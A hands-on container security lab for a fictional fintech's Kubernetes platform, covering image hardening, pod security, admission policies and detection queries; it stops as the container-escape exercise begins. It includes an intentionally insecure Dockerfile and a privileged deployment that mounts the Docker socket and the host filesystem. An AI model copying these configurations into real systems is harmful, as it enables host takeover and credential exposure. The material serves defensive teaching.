Skip to content

Lab 21: Cloud Container Security

Chapter: 20 — Cloud Attack & Defense Playbook Difficulty: ⭐⭐⭐ Intermediate-Advanced Estimated Time: 5–6 hours Prerequisites: Chapter 20, Chapter 30, basic Docker and Kubernetes knowledge


Overview

In this lab you will:

  1. Harden container images using multi-stage builds, distroless bases, and vulnerability scanning with Trivy and Grype
  2. Enforce Kubernetes Pod Security Standards (Restricted/Baseline/Privileged) with SecurityContext, RBAC, and admission controllers
  3. Simulate and detect container escape techniques including Docker socket abuse, privileged container breakout, and kernel exploits
  4. Implement Kubernetes NetworkPolicy, Calico/Cilium rules, and Istio service mesh security with mTLS
  5. Deploy runtime security monitoring with Falco rules, eBPF-based detection, and container forensics workflows
  6. Write KQL and SPL detection queries for every attack technique covered

Synthetic Data Only

All data in this lab is 100% synthetic and fictional. All IP addresses use RFC 5737 (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) or RFC 1918 (10.0.0.0/8, 172.16.0.0/12) reserved ranges. All domains use *.example.com. No real applications, real credentials, or real infrastructure are referenced. All credentials shown as REDACTED. This lab is for defensive education only — never use these techniques against systems you do not own or without explicit written authorization.


Scenario

Engagement Brief — NovaStar Fintech

Organization: NovaStar Fintech (fictional) Platform: CloudPay — microservices payment processing platform Cluster: cloudpay-prod.k8s.example.com (SYNTHETIC) Registry: registry.novstar.example.com (SYNTHETIC) API Server: https://203.0.113.10:6443 (SYNTHETIC — RFC 5737) Node Network: 10.50.0.0/16 (SYNTHETIC) Pod Network: 10.244.0.0/16 (SYNTHETIC) Service Network: 10.96.0.0/12 (SYNTHETIC) Cloud Provider: AWS EKS (SYNTHETIC — Account ID 123456789012) Engagement Type: Container security assessment — offensive and defensive Scope: All Kubernetes workloads, container images, runtime configurations, network policies Out of Scope: Underlying EC2 instances (OS-level), AWS control plane, DNS infrastructure Test Window: 2026-03-24 08:00 – 2026-03-26 20:00 UTC Emergency Contact: soc@novstar.example.com (SYNTHETIC)

Summary: NovaStar Fintech runs its CloudPay payment processing platform on Kubernetes (AWS EKS). After a recent industry breach involving container escape, the security team has commissioned a full container security assessment. Your mission is to evaluate image security, pod configurations, network segmentation, and runtime monitoring — then harden the environment against the threats you discover.


Certification Relevance

Certification Mapping

This lab maps to objectives in the following certifications:

Certification Relevant Domains
CKS (Certified Kubernetes Security Specialist) Cluster Setup (10%), System Hardening (15%), Minimize Microservice Vulnerabilities (20%), Supply Chain Security (20%), Monitoring/Logging/Runtime Security (20%)
CKAD (Certified Kubernetes Application Developer) Application Design (20%), Pod Design, Configuration (18%)
AWS Certified Security — Specialty (SCS-C02) Domain 3: Infrastructure Protection, Domain 4: Identity and Access Management
CompTIA Cloud+ (CV0-004) Domain 2: Security (22%), Domain 3: Deployment (24%)
CompTIA CySA+ (CS0-003) Domain 2: Vulnerability Management, Domain 4: Incident Response

Prerequisites

Required Tools

Tool Purpose Version
Docker Container runtime 24.x+
kubectl Kubernetes CLI 1.28+
minikube or kind Local Kubernetes cluster Latest
Trivy Image vulnerability scanner 0.50+
Grype Image vulnerability scanner 0.74+
Falco Runtime security monitoring 0.37+
Helm Kubernetes package manager 3.14+
istioctl Istio service mesh CLI 1.20+
curl / jq HTTP testing / JSON parsing Latest

Test Accounts (Synthetic)

Role Username Token Notes
Cluster Admin admin REDACTED Full cluster access
Developer testuser REDACTED Namespace-scoped access
CI/CD Service Account deploy-bot REDACTED Deployment only
Auditor auditor REDACTED Read-only access

Lab Environment Setup

# Create a local Kubernetes cluster with kind (SYNTHETIC)
$ kind create cluster --name cloudpay-lab --config kind-config.yaml
Creating cluster "cloudpay-lab" ...
  Ensuring node image (kindest/node:v1.29.2) 🖼
  Preparing nodes 📦 📦 📦
  Writing configuration 📝
  Starting control-plane 🕹️
  Installing CNI 🔌
  Installing StorageClass 💾
  Joining worker nodes 🚜
Set kubectl context to "kind-cloudpay-lab"

# Verify cluster is running
$ kubectl cluster-info --context kind-cloudpay-lab
Kubernetes control plane is running at https://127.0.0.1:46789
CoreDNS is running at https://127.0.0.1:46789/api/v1/namespaces/kube-system/services/kube-dns:dns/proxy

# Create namespaces for the lab
$ kubectl create namespace cloudpay-prod
namespace/cloudpay-prod created

$ kubectl create namespace cloudpay-staging
namespace/cloudpay-staging created

$ kubectl create namespace monitoring
namespace/monitoring created

$ kubectl create namespace istio-system
namespace/istio-system created

Lab Architecture (Synthetic)

┌──────────────────────────────────────────────────────────────────────────────┐
│                   NovaStar CloudPay — Kubernetes Architecture                │
│                                                                              │
│  ┌──────────────────────────────────────────────────────────────────────┐   │
│  │                    AWS EKS Cluster (SYNTHETIC)                       │   │
│  │                    203.0.113.10:6443 — API Server                    │   │
│  │                                                                      │   │
│  │  ┌──────────────┐  ┌──────────────┐  ┌──────────────┐              │   │
│  │  │  Node 1       │  │  Node 2       │  │  Node 3       │              │   │
│  │  │  10.50.1.10   │  │  10.50.1.20   │  │  10.50.1.30   │              │   │
│  │  │              │  │              │  │              │              │   │
│  │  │ ┌──────────┐ │  │ ┌──────────┐ │  │ ┌──────────┐ │              │   │
│  │  │ │ payment  │ │  │ │ auth-svc │ │  │ │ reporting│ │              │   │
│  │  │ │ gateway  │ │  │ │          │ │  │ │ service  │ │              │   │
│  │  │ └──────────┘ │  │ └──────────┘ │  │ └──────────┘ │              │   │
│  │  │ ┌──────────┐ │  │ ┌──────────┐ │  │ ┌──────────┐ │              │   │
│  │  │ │ order-   │ │  │ │ user-    │ │  │ │ notif-   │ │              │   │
│  │  │ │ service  │ │  │ │ service  │ │  │ │ service  │ │              │   │
│  │  │ └──────────┘ │  │ └──────────┘ │  │ └──────────┘ │              │   │
│  │  └──────────────┘  └──────────────┘  └──────────────┘              │   │
│  │                                                                      │   │
│  │  ┌───────────────────────────────────────────────┐                  │   │
│  │  │  Shared Services                               │                  │   │
│  │  │  PostgreSQL (10.50.2.10) | Redis (10.50.2.20) │                  │   │
│  │  │  Kafka (10.50.2.30)     | Vault (10.50.2.40)  │                  │   │
│  │  └───────────────────────────────────────────────┘                  │   │
│  └──────────────────────────────────────────────────────────────────────┘   │
│                                                                              │
│  ┌─────────────────────┐    ┌─────────────────────┐                        │
│  │ Container Registry   │    │ Monitoring Stack     │                        │
│  │ registry.novstar     │    │ Prometheus/Grafana   │                        │
│  │ .example.com         │    │ Falco / Fluentd      │                        │
│  └─────────────────────┘    └─────────────────────┘                        │
└──────────────────────────────────────────────────────────────────────────────┘

Exercise 1: Container Image Security

Objective

Evaluate and harden container images used in the CloudPay platform. You will identify vulnerabilities in existing images, implement multi-stage builds with distroless base images, and establish an image scanning pipeline.

Prerequisites

  • Docker installed and running
  • Trivy and Grype CLI tools installed
  • Access to the synthetic registry registry.novstar.example.com

Step 1.1: Audit the Existing Dockerfile

The CloudPay payment gateway uses the following vulnerable Dockerfile:

# VULNERABLE Dockerfile — payment-gateway (SYNTHETIC)
# DO NOT use in production — this is intentionally insecure for educational purposes

FROM ubuntu:22.04

# Anti-pattern: Running as root
# Anti-pattern: Installing unnecessary packages
RUN apt-get update && apt-get install -y \
    python3 python3-pip \
    curl wget netcat nmap \
    vim nano \
    ssh openssh-server \
    && rm -rf /var/lib/apt/lists/*

# Anti-pattern: Embedding secrets in image layers
ENV DB_PASSWORD="REDACTED"
ENV API_KEY="REDACTED"
ENV AWS_ACCESS_KEY_ID="REDACTED"
ENV AWS_SECRET_ACCESS_KEY="REDACTED"

# Anti-pattern: Copying entire project including .git, tests, docs
COPY . /app
WORKDIR /app

# Anti-pattern: Installing all dependencies including dev
RUN pip3 install -r requirements.txt

# Anti-pattern: Exposing unnecessary ports
EXPOSE 8080 22 5432

# Anti-pattern: Running as root with no health check
CMD ["python3", "app.py"]

Identify the security issues:

Issue Category Severity Description
1 Base Image High Full Ubuntu image includes unnecessary attack surface (shells, package managers, utilities)
2 Root User Critical Container runs as root — any compromise gives root access to the container filesystem
3 Embedded Secrets Critical Credentials baked into environment variables visible in image layers
4 Unnecessary Packages High Network tools (nmap, netcat), SSH server, editors expand attack surface
5 No .dockerignore Medium .git, tests, documentation copied into image
6 Dev Dependencies Medium Development packages installed in production image
7 Exposed Ports Medium SSH (22) and database (5432) ports unnecessarily exposed
8 No Health Check Low No HEALTHCHECK instruction for orchestrator health monitoring
9 No Image Signing Medium Image not signed — no guarantee of integrity
10 Mutable Tag Medium No pinned digest — ubuntu:22.04 can be replaced by attacker

Step 1.2: Scan Images with Trivy

# Scan the vulnerable image (SYNTHETIC)
$ trivy image registry.novstar.example.com/payment-gateway:v2.1.0

2026-03-24T10:15:32Z  INFO  Vulnerability DB loaded
2026-03-24T10:15:34Z  INFO  Detected OS: ubuntu 22.04

registry.novstar.example.com/payment-gateway:v2.1.0 (ubuntu 22.04)

Total: 247 (UNKNOWN: 3, LOW: 68, MEDIUM: 112, HIGH: 51, CRITICAL: 13)

┌────────────────────┬──────────────────┬──────────┬────────────────┬─────────────────┬──────────────────────────────────────┐
     Library          Vulnerability    Severity  Installed Ver     Fixed Ver                 Title                     ├────────────────────┼──────────────────┼──────────┼────────────────┼─────────────────┼──────────────────────────────────────┤
 libssl3             CVE-2024-XXXXX    CRITICAL  3.0.2-0ubuntu   3.0.2-0ubuntu    OpenSSL: Buffer overflow in                                                           1.12            1.15             X.509 certificate verification        openssh-server      CVE-2024-XXXXX    CRITICAL  1:8.9p1-3ubu    1:8.9p1-3ubu    OpenSSH: Remote code execution                                                        ntu0.6          ntu0.10          via crafted authentication            python3.10          CVE-2024-XXXXX    HIGH      3.10.6-1~22.    3.10.6-1~22.    Python: Arbitrary code execution                                                      04.2            04.5             via crafted pickle data               curl                CVE-2024-XXXXX    HIGH      7.81.0-1ubunt   7.81.0-1ubunt   curl: HSTS bypass via IDN                                                             u1.15           u1.18                                                  nmap                CVE-2024-XXXXX    MEDIUM    7.91+dfsg1+r                     Nmap: Script engine RCE                                                               eally-1build1                                                         └────────────────────┴──────────────────┴──────────┴────────────────┴─────────────────┴──────────────────────────────────────┘

Python (pip)
Total: 18 (HIGH: 8, CRITICAL: 3, MEDIUM: 5, LOW: 2)

┌─────────────────┬──────────────────┬──────────┬────────────────┬─────────────────┬──────────────────────────────────────┐
    Library        Vulnerability    Severity  Installed Ver     Fixed Ver                 Title                     ├─────────────────┼──────────────────┼──────────┼────────────────┼─────────────────┼──────────────────────────────────────┤
 Flask            CVE-2024-XXXXX    HIGH      2.2.2           2.3.3            Flask: Session cookie tampering       requests         CVE-2024-XXXXX    HIGH      2.28.0          2.31.0           requests: Unintended credential                                                                                     exposure on redirect                  cryptography     CVE-2024-XXXXX    CRITICAL  38.0.1          42.0.0           cryptography: NULL pointer                                                                                          deref in PKCS12 parsing               Werkzeug         CVE-2024-XXXXX    HIGH      2.2.2           2.3.8            Werkzeug: Debugger PIN bypass        └─────────────────┴──────────────────┴──────────┴────────────────┴─────────────────┴──────────────────────────────────────┘

Secrets found in image:
  /app/.env  AWS_ACCESS_KEY_ID=REDACTED
  /app/.env  AWS_SECRET_ACCESS_KEY=REDACTED
  /app/config/database.yml  password: REDACTED

Step 1.3: Scan with Grype for Comparison

# Scan the same image with Grype (SYNTHETIC)
$ grype registry.novstar.example.com/payment-gateway:v2.1.0

  Vulnerability DB loaded
  Loaded image
  Parsed image
  Cataloged packages      [312 packages]
  Scanned for vulnerabilities     [265 vulnerability matches]

NAME                INSTALLED     FIXED-IN      TYPE    VULNERABILITY   SEVERITY
cryptography        38.0.1        42.0.0        python  CVE-2024-XXXXX  Critical
libssl3             3.0.2-0ubu... 3.0.2-0ubu... deb     CVE-2024-XXXXX  Critical
openssh-server      1:8.9p1-3...  1:8.9p1-3...  deb     CVE-2024-XXXXX  Critical
Flask               2.2.2         2.3.3         python  CVE-2024-XXXXX  High
python3.10          3.10.6-1~...  3.10.6-1~...  deb     CVE-2024-XXXXX  High
requests            2.28.0        2.31.0        python  CVE-2024-XXXXX  High
Werkzeug            2.2.2         2.3.8         python  CVE-2024-XXXXX  High
curl                7.81.0-1...   7.81.0-1...   deb     CVE-2024-XXXXX  High
...

265 vulnerabilities found (13 critical, 51 high, 112 medium, 68 low, 3 unknown, 18 negligible)

Step 1.4: Create a Hardened Dockerfile

# HARDENED Dockerfile — payment-gateway (SYNTHETIC)
# Multi-stage build with distroless base

# ============================================
# Stage 1: Build stage
# ============================================
FROM python:3.11-slim@sha256:abc123def456... AS builder

# Create non-root user for build
RUN groupadd -r appuser && useradd -r -g appuser -d /home/appuser appuser

WORKDIR /build

# Copy only dependency files first (leverage Docker layer caching)
COPY requirements.txt .

# Install production dependencies only
RUN pip install --no-cache-dir --prefix=/install -r requirements.txt

# Copy application code (after dependencies for better caching)
COPY src/ ./src/
COPY config/production.yaml ./config/

# ============================================
# Stage 2: Production stage — distroless
# ============================================
FROM gcr.io/distroless/python3-debian12@sha256:def789ghi012...

# Copy installed packages from builder
COPY --from=builder /install /usr/local

# Copy application from builder
COPY --from=builder /build/src /app/src
COPY --from=builder /build/config /app/config

WORKDIR /app

# Run as non-root user (distroless uses nonroot user UID 65534)
USER 65534:65534

# Only expose the application port
EXPOSE 8080

# Health check for Kubernetes readiness/liveness probes
# Note: distroless has no shell — use exec form only
HEALTHCHECK --interval=30s --timeout=5s --retries=3 \
    CMD ["/usr/local/bin/python3", "/app/src/healthcheck.py"]

ENTRYPOINT ["/usr/local/bin/python3"]
CMD ["/app/src/app.py"]

Step 1.5: Create .dockerignore

# .dockerignore — prevent sensitive files from entering the image
.git
.gitignore
.env
.env.*
*.md
*.txt
!requirements.txt
Dockerfile*
docker-compose*
tests/
docs/
scripts/
*.pyc
__pycache__/
.pytest_cache/
.coverage
htmlcov/
*.pem
*.key
*.crt
credentials/
secrets/

Step 1.6: Scan the Hardened Image

# Build the hardened image (SYNTHETIC)
$ docker build -t registry.novstar.example.com/payment-gateway:v2.2.0-hardened .

# Scan the hardened image
$ trivy image registry.novstar.example.com/payment-gateway:v2.2.0-hardened

registry.novstar.example.com/payment-gateway:v2.2.0-hardened (debian 12)

Total: 12 (LOW: 5, MEDIUM: 5, HIGH: 2, CRITICAL: 0)

# Compare sizes
$ docker images | grep payment-gateway
payment-gateway   v2.1.0          1.2GB
payment-gateway   v2.2.0-hardened 89MB

Reduction summary:

Metric Before After Improvement
Total Vulnerabilities 265 12 95.5% reduction
Critical 13 0 100% eliminated
High 51 2 96% reduction
Image Size 1.2 GB 89 MB 93% smaller
Installed Packages 312 47 85% fewer
Secrets in Image 3 0 100% eliminated
Runs as Root Yes No Non-root

Step 1.7: Implement Image Policy with Cosign

# Sign the hardened image with cosign (SYNTHETIC)
$ cosign sign --key cosign.key registry.novstar.example.com/payment-gateway:v2.2.0-hardened

Pushing signature to: registry.novstar.example.com/payment-gateway:sha256-abc123...sig

# Verify the signature
$ cosign verify --key cosign.pub registry.novstar.example.com/payment-gateway:v2.2.0-hardened

Verification for registry.novstar.example.com/payment-gateway:v2.2.0-hardened --
The following checks were performed on each of these signatures:
  - The cosign claims were validated
  - The signatures were verified against the specified public key

[{"critical":{"identity":{"docker-reference":"registry.novstar.example.com/payment-gateway"},
"image":{"docker-manifest-digest":"sha256:abc123def456..."},
"type":"cosign container image signature"},
"optional":{"timestamp":"2026-03-24T10:30:00Z"}}]

Detection Queries — Image Security

KQL — Detect unscanned images deployed to cluster:

// KQL: Detect container images deployed without vulnerability scan
ContainerInventory
| where TimeGenerated > ago(24h)
| where ImageTag !contains "hardened" and ImageTag !contains "scanned"
| join kind=leftanti (
    SecurityAssessment
    | where AssessmentType == "ContainerImageScan"
    | where TimeGenerated > ago(7d)
    | project ImageName = tostring(parse_json(ExtendedProperties).ImageName)
) on $left.Image == $right.ImageName
| project TimeGenerated, Computer, ContainerID, Image, ImageTag, Namespace
| summarize Count=count() by Image, Namespace
| where Count > 0
| sort by Count desc

SPL — Detect images pulled from untrusted registries:

index=kubernetes sourcetype="kube:container:event"
| eval image=coalesce('spec.containers{}.image', 'status.containerStatuses{}.image')
| where isnotnull(image)
| eval trusted_registry=if(match(image, "^(registry\.novstar\.example\.com|gcr\.io/distroless)"), "yes", "no")
| where trusted_registry="no"
| stats count by image, namespace, pod_name, _time
| sort -count
| rename image as "Untrusted Image", namespace as "Namespace", pod_name as "Pod"

Key Takeaways — Exercise 1

Image Security Principles

  1. Minimize attack surface — Use distroless or scratch base images; remove shells, package managers, and debugging tools from production
  2. Pin image digests — Never rely on mutable tags; always pin to SHA256 digests
  3. Multi-stage builds — Separate build dependencies from runtime to reduce image size and vulnerability count
  4. Never embed secrets — Use Kubernetes Secrets, Vault, or CSI drivers for credential injection at runtime
  5. Scan continuously — Integrate Trivy/Grype into CI/CD and scan on a schedule; vulnerabilities emerge after deployment
  6. Sign and verify — Use cosign or Notary to ensure image integrity and provenance

Exercise 2: Kubernetes Pod Security

Objective

Implement and enforce Pod Security Standards across the CloudPay cluster. Configure SecurityContext, RBAC policies, service account hardening, and OPA Gatekeeper admission controllers.

Prerequisites

  • Kubernetes cluster running (from Lab Environment Setup)
  • kubectl configured with admin access
  • Helm installed for Gatekeeper deployment

Step 2.1: Audit Existing Pod Security

Examine the current (insecure) deployment for the payment gateway:

# INSECURE deployment — payment-gateway (SYNTHETIC)
# DO NOT use in production — intentionally insecure for educational purposes
apiVersion: apps/v1
kind: Deployment
metadata:
  name: payment-gateway
  namespace: cloudpay-prod
spec:
  replicas: 3
  selector:
    matchLabels:
      app: payment-gateway
  template:
    metadata:
      labels:
        app: payment-gateway
    spec:
      # Anti-pattern: using default service account
      # Anti-pattern: no securityContext
      # Anti-pattern: no resource limits
      containers:
      - name: payment-gateway
        image: registry.novstar.example.com/payment-gateway:v2.1.0
        ports:
        - containerPort: 8080
        # Anti-pattern: privileged container
        securityContext:
          privileged: true
          runAsRoot: true
        # Anti-pattern: mounting Docker socket
        volumeMounts:
        - name: docker-sock
          mountPath: /var/run/docker.sock
        - name: host-filesystem
          mountPath: /host
        # Anti-pattern: no resource limits (enables noisy neighbor / DoS)
        env:
        - name: DB_PASSWORD
          value: "REDACTED"
      volumes:
      - name: docker-sock
        hostPath:
          path: /var/run/docker.sock
      - name: host-filesystem
        hostPath:
          path: /
          type: Directory

Security issues identified:

Issue Severity Impact
privileged: true Critical Full host kernel access; trivial container escape
Docker socket mounted Critical Can create containers on host; full host compromise
Host filesystem mounted at / Critical Read/write access to entire host filesystem
Running as root High Unnecessary privilege inside container
Default service account High May have excessive RBAC permissions
Secrets in env vars High Visible in pod spec, kubectl describe, and process listing
No resource limits Medium Enables CPU/memory DoS against other pods
No network policy Medium Unrestricted lateral movement within cluster

Step 2.2: Apply Pod Security Standards

Kubernetes provides three built-in Pod Security Standards: Privileged, Baseline, and Restricted.

# Label namespace to enforce Restricted Pod Security Standard
$ kubectl label namespace cloudpay-prod \
    pod-security.kubernetes.io/enforce=restricted \
    pod-security.kubernetes.io/enforce-version=latest \
    pod-security.kubernetes.io/audit=restricted \
    pod-security.kubernetes.io/audit-version=latest \
    pod-security.kubernetes.io/warn=restricted \
    pod-security.kubernetes.io/warn-version=latest

namespace/cloudpay-prod labeled

# Verify labels
$ kubectl get namespace cloudpay-prod -o jsonpath='{.metadata.labels}' | jq .
{
  "kubernetes.io/metadata.name": "cloudpay-prod",
  "pod-security.kubernetes.io/enforce": "restricted",
  "pod-security.kubernetes.io/enforce-version": "latest",
  "pod-security.kubernetes.io/audit": "restricted",
  "pod-security.kubernetes.io/audit-version": "latest",
  "pod-security.kubernetes.io/warn": "restricted",
  "pod-security.kubernetes.io/warn-version": "latest"
}

# Try deploying the insecure pod — it will be rejected
$ kubectl apply -f insecure-payment-gateway.yaml
Error from server (Forbidden): error when creating "insecure-payment-gateway.yaml":
pods "payment-gateway" is forbidden: violates PodSecurity "restricted:latest":
  privileged (container "payment-gateway" must not set securityContext.privileged=true),
  runAsNonRoot (pod or container "payment-gateway" must set securityContext.runAsNonRoot=true),
  hostPath volumes (volumes "docker-sock", "host-filesystem" uses disallowed hostPath),
  seccompProfile (pod or container "payment-gateway" must set securityContext.seccompProfile.type)

Step 2.3: Create a Hardened Deployment

# HARDENED deployment — payment-gateway (SYNTHETIC)
apiVersion: apps/v1
kind: Deployment
metadata:
  name: payment-gateway
  namespace: cloudpay-prod
  labels:
    app: payment-gateway
    tier: backend
    version: v2.2.0
spec:
  replicas: 3
  selector:
    matchLabels:
      app: payment-gateway
  template:
    metadata:
      labels:
        app: payment-gateway
        tier: backend
      annotations:
        seccomp.security.alpha.kubernetes.io/pod: runtime/default
    spec:
      # Use a dedicated service account with minimal permissions
      serviceAccountName: payment-gateway-sa
      automountServiceAccountToken: false

      # Pod-level security context
      securityContext:
        runAsNonRoot: true
        runAsUser: 65534
        runAsGroup: 65534
        fsGroup: 65534
        seccompProfile:
          type: RuntimeDefault

      containers:
      - name: payment-gateway
        image: registry.novstar.example.com/payment-gateway:v2.2.0-hardened@sha256:abc123def456...
        ports:
        - containerPort: 8080
          protocol: TCP

        # Container-level security context
        securityContext:
          allowPrivilegeEscalation: false
          readOnlyRootFilesystem: true
          runAsNonRoot: true
          runAsUser: 65534
          capabilities:
            drop:
              - ALL
          seccompProfile:
            type: RuntimeDefault

        # Resource limits prevent DoS
        resources:
          requests:
            cpu: 100m
            memory: 128Mi
          limits:
            cpu: 500m
            memory: 512Mi

        # Health checks for orchestrator
        readinessProbe:
          httpGet:
            path: /healthz
            port: 8080
          initialDelaySeconds: 5
          periodSeconds: 10
        livenessProbe:
          httpGet:
            path: /healthz
            port: 8080
          initialDelaySeconds: 15
          periodSeconds: 20

        # Secrets from Kubernetes Secrets — not env vars
        envFrom:
        - secretRef:
            name: payment-gateway-secrets

        # Writable temp directory using emptyDir
        volumeMounts:
        - name: tmp-volume
          mountPath: /tmp
        - name: cache-volume
          mountPath: /app/cache

      volumes:
      - name: tmp-volume
        emptyDir:
          medium: Memory
          sizeLimit: 64Mi
      - name: cache-volume
        emptyDir:
          sizeLimit: 128Mi

Step 2.4: Configure RBAC — Least Privilege

# Service account for payment-gateway (SYNTHETIC)
apiVersion: v1
kind: ServiceAccount
metadata:
  name: payment-gateway-sa
  namespace: cloudpay-prod
  annotations:
    description: "Minimal service account for payment gateway pods"
automountServiceAccountToken: false

---
# Role with minimal permissions
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: payment-gateway-role
  namespace: cloudpay-prod
rules:
# Only read ConfigMaps needed by the application
- apiGroups: [""]
  resources: ["configmaps"]
  resourceNames: ["payment-gateway-config"]
  verbs: ["get", "watch"]
# Only read own Secrets
- apiGroups: [""]
  resources: ["secrets"]
  resourceNames: ["payment-gateway-secrets"]
  verbs: ["get"]

---
# Bind the role to the service account
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: payment-gateway-binding
  namespace: cloudpay-prod
subjects:
- kind: ServiceAccount
  name: payment-gateway-sa
  namespace: cloudpay-prod
roleRef:
  kind: Role
  name: payment-gateway-role
  apiGroup: rbac.authorization.k8s.io

---
# Developer role — namespace-scoped (SYNTHETIC)
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: developer-role
  namespace: cloudpay-staging
rules:
- apiGroups: ["", "apps"]
  resources: ["pods", "deployments", "services", "configmaps"]
  verbs: ["get", "list", "watch", "create", "update", "patch"]
- apiGroups: [""]
  resources: ["pods/log"]
  verbs: ["get", "list"]
# Explicitly deny exec into pods in staging
# (absence of pods/exec means it is denied by default)

---
# Auditor role — read-only cluster-wide (SYNTHETIC)
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: security-auditor
rules:
- apiGroups: ["", "apps", "networking.k8s.io", "rbac.authorization.k8s.io"]
  resources: ["*"]
  verbs: ["get", "list", "watch"]
- apiGroups: [""]
  resources: ["secrets"]
  verbs: []  # Auditors cannot read secret values

Step 2.5: Deploy OPA Gatekeeper Admission Controller

# Install OPA Gatekeeper via Helm (SYNTHETIC)
$ helm repo add gatekeeper https://open-policy-agent.github.io/gatekeeper/charts
$ helm install gatekeeper gatekeeper/gatekeeper --namespace gatekeeper-system --create-namespace

NAME: gatekeeper
STATUS: deployed
REVISION: 1

Constraint Template — Block Privileged Containers:

# OPA Gatekeeper ConstraintTemplate (SYNTHETIC)
apiVersion: templates.gatekeeper.sh/v1
kind: ConstraintTemplate
metadata:
  name: k8sblockprivileged
spec:
  crd:
    spec:
      names:
        kind: K8sBlockPrivileged
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package k8sblockprivileged

        violation[{"msg": msg}] {
          container := input.review.object.spec.containers[_]
          container.securityContext.privileged == true
          msg := sprintf("Privileged container not allowed: %v", [container.name])
        }

        violation[{"msg": msg}] {
          container := input.review.object.spec.initContainers[_]
          container.securityContext.privileged == true
          msg := sprintf("Privileged init container not allowed: %v", [container.name])
        }

Constraint Template — Block Host Path Volumes:

apiVersion: templates.gatekeeper.sh/v1
kind: ConstraintTemplate
metadata:
  name: k8sblockhostpath
spec:
  crd:
    spec:
      names:
        kind: K8sBlockHostPath
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package k8sblockhostpath

        violation[{"msg": msg}] {
          volume := input.review.object.spec.volumes[_]
          volume.hostPath
          msg := sprintf("hostPath volume not allowed: %v", [volume.name])
        }

Constraint Template — Require Non-Root:

apiVersion: templates.gatekeeper.sh/v1
kind: ConstraintTemplate
metadata:
  name: k8srequirenonroot
spec:
  crd:
    spec:
      names:
        kind: K8sRequireNonRoot
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package k8srequirenonroot

        violation[{"msg": msg}] {
          not input.review.object.spec.securityContext.runAsNonRoot
          container := input.review.object.spec.containers[_]
          not container.securityContext.runAsNonRoot
          msg := sprintf("Container %v must set runAsNonRoot=true", [container.name])
        }

Apply Constraints:

# Apply constraints to production namespace (SYNTHETIC)
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sBlockPrivileged
metadata:
  name: block-privileged-prod
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Pod"]
    namespaces: ["cloudpay-prod"]

---
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sBlockHostPath
metadata:
  name: block-hostpath-prod
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Pod"]
    namespaces: ["cloudpay-prod"]

---
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sRequireNonRoot
metadata:
  name: require-nonroot-prod
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Pod"]
    namespaces: ["cloudpay-prod"]
# Verify constraints are enforced (SYNTHETIC)
$ kubectl get constraints
NAME                      ENFORCEMENT-ACTION   TOTAL-VIOLATIONS
block-privileged-prod     deny                 0
block-hostpath-prod       deny                 0
require-nonroot-prod      deny                 0

# Test: try deploying a privileged pod
$ kubectl run test-priv --image=nginx --namespace=cloudpay-prod \
    --overrides='{"spec":{"containers":[{"name":"test","image":"nginx","securityContext":{"privileged":true}}]}}'

Error from server (Forbidden): admission webhook "validation.gatekeeper.sh" denied the request:
  [block-privileged-prod] Privileged container not allowed: test

Detection Queries — Pod Security

KQL — Detect privileged container creation:

// KQL: Detect privileged containers created in any namespace
KubeEvents
| where TimeGenerated > ago(1h)
| where ObjectKind == "Pod"
| where Reason == "Created" or Reason == "Started"
| extend PodSpec = parse_json(Message)
| where PodSpec has "privileged" and PodSpec has "true"
| project TimeGenerated, ClusterName, Namespace, Name,
          Computer, Reason, Message
| sort by TimeGenerated desc

// KQL: Detect RBAC escalation — new ClusterRoleBinding creation
AuditLogs
| where TimeGenerated > ago(24h)
| where ObjectRef_Resource == "clusterrolebindings"
| where Verb in ("create", "patch", "update")
| extend User = tostring(User_Username)
| extend RoleName = tostring(ObjectRef_Name)
| project TimeGenerated, User, Verb, RoleName,
          SourceIPs = tostring(SourceIPs)
| sort by TimeGenerated desc

SPL — Detect pods running as root:

index=kubernetes sourcetype="kube:objects:pods"
| spath "spec.securityContext.runAsUser" output=pod_uid
| spath "spec.containers{}.securityContext.runAsUser" output=container_uid
| eval effective_uid=coalesce(container_uid, pod_uid, "0")
| where effective_uid="0" OR isnull(effective_uid)
| stats count by namespace, pod_name, effective_uid, image
| where namespace="cloudpay-prod"
| rename namespace as "Namespace", pod_name as "Pod", image as "Image"
| sort -count

// SPL: Detect service account token auto-mounting
index=kubernetes sourcetype="kube:objects:pods"
| spath "spec.automountServiceAccountToken"
| where 'spec.automountServiceAccountToken'!="false"
| stats count by namespace, pod_name, spec.serviceAccountName
| sort -count

Key Takeaways — Exercise 2

Pod Security Principles

  1. Enforce Pod Security Standards — Use namespace labels for Restricted/Baseline enforcement; never allow Privileged in production
  2. Security Context is mandatory — Always set runAsNonRoot, readOnlyRootFilesystem, allowPrivilegeEscalation: false, and drop all capabilities
  3. RBAC least privilege — Dedicated service accounts per workload; never use the default service account; disable auto-mount of tokens
  4. Admission controllers — OPA Gatekeeper or Kyverno provide policy-as-code enforcement that prevents misconfigurations before deployment
  5. Resource limits — Always set CPU and memory requests/limits to prevent DoS and enable fair scheduling
  6. Secrets management — Never embed secrets in pod specs or environment variables; use Kubernetes Secrets with CSI drivers or external vaults

Exercise 3: Container Escape & Privilege Escalation

Objective

Understand common container escape techniques, simulate them in a controlled environment, and build detection rules using Falco, KQL, and SPL. This exercise covers both the red team (attack) and blue team (detection) perspectives.

Educational Purpose Only

Container escape techniques are demonstrated here exclusively for defensive education. Understanding how escapes work enables security teams to build detection and prevention controls. Never attempt these techniques on systems without explicit written authorization.

Prerequisites

  • Lab cluster running with a dedicated attack-lab namespace (not production)
  • Falco installed for runtime detection
  • Understanding of Linux namespaces and cgroups

Step 3.1: Escape via Mounted Docker Socket

When a container has the Docker socket (/var/run/docker.sock) mounted, an attacker can interact with the Docker daemon on the host, effectively breaking out of the container.
